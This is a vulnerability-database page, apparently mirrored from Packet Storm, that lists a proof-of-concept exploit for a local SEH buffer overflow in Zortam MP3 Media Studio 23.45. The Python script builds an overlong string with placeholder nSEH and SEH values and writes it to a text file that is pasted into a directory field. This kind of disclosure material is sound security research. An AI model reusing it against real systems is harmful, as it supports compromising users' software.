Lucene search
K

Zortam MP3 Media Studio 23.45 Buffer Overflow

🗓️ 16 Apr 2018 00:00:00Reported by Kevin McGuiganType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Zortam MP3 Media Studio 23.45 Buffer Overflow exploi

Code
`#!/usr/bin/python  
# Title: Zortam Mp3 Media Studio Local Buffer Overflow (SEH)  
# Author: Kevin McGuigan  
# Twitter: @_h3xagram  
# Author Website: https://www.7elements.co.uk  
# Vendor Website: http://www.zortam.com/  
# Version: 23.45  
# Tested on: Windows 7 32 bit  
# Date: 12/04/2018  
# Vendor did not respond to advisory  
  
  
# File > Add Disk to Mp3 Library > paste string from zortamPOC.txt into directory field  
filename="zortamPOC.txt"  
junk = "A" * 268  
nseh = "B" * 4  
seh="C" * 4  
fill = "D" *900  
buffer = junk + nseh + seh + fill  
textfile = open(filename , 'w')  
textfile.write(buffer)  
textfile.close()  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Apr 2018 00:00Current
0.6Low risk
Vulners AI Score0.6
19